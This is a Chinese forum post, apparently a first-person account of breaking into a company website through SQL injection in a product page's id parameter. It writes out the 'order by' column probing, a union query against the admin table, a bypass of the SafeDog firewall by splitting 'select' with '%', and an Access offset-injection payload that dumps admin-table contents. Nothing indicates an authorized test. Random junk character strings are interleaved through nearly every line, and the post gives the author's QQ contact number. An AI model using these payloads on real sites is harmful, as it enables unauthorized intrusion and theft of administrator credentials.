打开网站,一个企业站。3 B% v# A9 T* a0 k: t- V' G
3 M! M, w0 _9 k# _6 `2 y
6 t, S* G2 _; K顺手加个admin
; C+ a% l; p& }( T
! {8 c0 [% q$ O# f! d
7 A6 g( F) r s& v4 Y% _/ }1 l! ~3 I默认后台。
& _: A* h& A0 m/ W0 \- w! j Y0 G回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
7 [0 M3 e5 m5 P L7 T( i) Y% K1 o7 p ~
& R. H4 M1 O1 v8 U3 X$ t. S+ @4 D# Y q8 x6 g7 T& h
所以就不用御剑扫了,待会直接封IP。( l N3 _. J9 Y T
* {3 D/ ~% H ]" a, P3 L9 z) g用order by语句判断是否存在注入。1 |/ F: Y+ o: H' Q+ x
http://www.xxx.com /product_show.asp?id=997 order by 15 i; m, A- M3 _7 Y" D' U
http://www.xxx.com /product_show.asp?id=997 order by 100
9 N. x$ q% ?1 k4 t$ Y) E现在存在注入,经测试后发现是9个字段。$ r; }5 v8 ?0 L
8 T4 |/ q9 b+ j& N' H0 Q接下来进行联合查询,猜是否存在admin表。1 b: ?8 W9 [. g
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
d; u. E" i" R: }6 C0 X2 j% ]8 \) J* g7 H! u4 y2 N
! C- d5 P+ L8 r4 D+ ]2 z
2 S d) X) R2 l* R% b* z& R) M在select中间加个%,se%lect绕过安全狗。& ?. p ~5 N1 [: A' B4 p' z K7 ?
: ^. M& }7 x! I5 u+ H# g# o2 \. ~" K+ X+ r" K* p2 x% z, H* g' c; O0 L% R
发现存在admin表,然后开始手工猜常用的字段。& a5 S h! c' H3 s: t. K6 v6 V
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。( g% d# n' i6 Q J5 u
: x, s& E5 w) Z3 J4 S
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。" ~- A$ i$ ]( w, c' Q. R$ \, g
+ I+ ^ x7 Q# |4 @" Z+ i* D科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
# ~& e% \/ S, z( |! U7 Lhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
7 D& j( [! t% w9 q' k* Y好了,敏感内容出显了。
% e/ B0 j) Y; p+ ~8 ]$ p
1 @& _3 Y% {) n8 ?) P& B# a1 ^# {3 T- R3 n
5 c9 D% p7 J2 ]8 h5 v! { |